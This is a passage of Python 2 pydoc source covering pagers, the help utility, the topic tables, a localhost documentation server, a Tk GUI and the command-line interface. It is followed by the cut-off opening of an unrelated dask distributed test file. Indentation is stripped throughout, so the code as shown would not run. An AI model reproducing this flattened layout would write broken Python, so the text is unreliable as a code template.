elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
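# For example (illustrative): TextDoc.bold() overstrikes every character as
# 'c\bc', so plain('t\bte\bex\bxt\bt') returns 'text'.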
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
        # The LINES environment variable is a string; convert before arithmetic.
        r = inc = int(os.environ.get('LINES', 25)) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
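# A minimal sketch (not part of pydoc) of driving the Scanner above over a
# tiny, purely hypothetical tree of (name, children) pairs: "children"
# returns a node's child list and "descendp" decides whether to walk into it.
def _scanner_demo():
    tree = ('root', [('a', []), ('b', [('b1', [])])])
    scanner = Scanner([tree],
                      children=lambda node: list(node[1]),
                      descendp=lambda node: bool(node[1]))
    names = []
    node = scanner.next()
    while node is not None:
        names.append(node[0])
        node = scanner.next()
    return names  # ['a', 'b', 'b1'] -- the root itself is never yielded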
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import sys
if sys.platform.startswith('java'):
from select import cpython_compatible_select as select
else:
from select import select
self.quit = False
while not self.quit:
rd, wr, ex = select([self.socket], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
        # file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
test_nanny.py
|
import asyncio
from contextlib import suppress
import gc
import logging
import os
import random
import sys
import multiprocessing as mp
import numpy as np
import pytest
from tlz import valmap, first
from tornado.ioloop import IOLoop
import dask
from distributed.diagnostics import SchedulerPlugin
from distributed import Nanny, rpc, Scheduler, Worker, Client, wait, worker
from distributed.core import CommClosedError
from distributed.metrics import time
from distributed.protocol.pickle import dumps
from distributed.utils import tmpfile, TimeoutError, parse_ports
from distributed.utils_test import ( # noqa: F401
gen_cluster,
gen_test,
inc,
captured_logger,
cleanup,
)
# FIXME why does this leave behind unclosed Comm objects?
@gen_cluster(nthreads=[], allow_unclosed=True)
async def test_nanny(s):
async with Nanny(s.address, nthreads=2, loop=s.loop) as n:
